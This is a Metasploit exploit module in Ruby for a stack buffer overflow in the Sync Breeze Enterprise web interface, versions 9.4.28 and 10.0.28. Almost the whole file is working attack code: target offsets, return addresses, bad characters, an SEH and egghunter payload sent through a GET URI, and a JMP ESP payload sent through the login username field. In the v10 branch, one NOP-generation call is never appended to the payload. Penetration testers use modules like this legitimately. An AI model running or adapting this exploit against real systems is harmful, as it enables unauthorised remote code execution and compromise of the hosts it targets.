metasploit-framework/modules/exploits/windows/http/syncbreeze_bof.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sync Breeze Enterprise GET Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability
        in the web interface of Sync Breeze Enterprise v9.4.28 and v10.0.28, caused by
        improper bounds checking of the request in HTTP GET and POST requests
        sent to the built-in web server. This module has been tested
        successfully on Windows 7 SP1 x86.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Daniel Teixeira',
          'Andrew Smith', # MSF support for v10.0.28
          'Owais Mehtab'  # Original v10.0.28 exploit
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x09\x0a\x0d\x20\x26",
          'Space'      => 500
        },
      'Targets'        =>
        [
          [ 'Sync Breeze Enterprise v9.4.28',
            {
              'Offset' => 2488,
              'Ret'    => 0x10015fde  # POP # POP # RET [libspp.dll]
            }
          ],
          [ 'Sync Breeze Enterprise v10.0.28',
            {
              'Offset' => 780,
              'Ret'    => 0x10090c83  # JMP ESP [libspp.dll]
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Mar 15 2017',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/'
    )

    if res && res.code == 200
      version = res.body[/Sync Breeze Enterprise v[^<]*/]
      if version
        vprint_status("Version detected: #{version}")
        if version =~ /9\.4\.28/ or version =~ /10\.0\.28/
          return Exploit::CheckCode::Appears
        end
        return Exploit::CheckCode::Detected
      end
    else
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def exploit

    case target.name

    when 'Sync Breeze Enterprise v9.4.28'
      eggoptions = {
        checksum: true,
        eggtag: rand_text_alpha(4, payload_badchars)
      }

      hunter, egg = generate_egghunter(
        payload.encoded,
        payload_badchars,
        eggoptions
      )

      sploit =  rand_text_alpha(target['Offset'])
      sploit << generate_seh_record(target.ret)
      sploit << hunter
      sploit << make_nops(10)
      sploit << egg
      sploit << rand_text_alpha(5500)

      print_status('Sending request...')

      send_request_cgi(
        'method' => 'GET',
        'uri'    => sploit
      )

    when 'Sync Breeze Enterprise v10.0.28'
      uri = "/login"
      sploit = rand_text_alpha(target['Offset'])
      sploit << [target.ret].pack('V')
      sploit << rand_text(4)
      make_nops(10)
      sploit << payload.encoded

      print_status('Sending request...')

      send_request_cgi(
        'method' => 'POST',
        'uri'    => uri,
        'vars_post'     => {
          'username' => "#{sploit}",
          'password' => "rawr"
        }
      )
    end
  end
end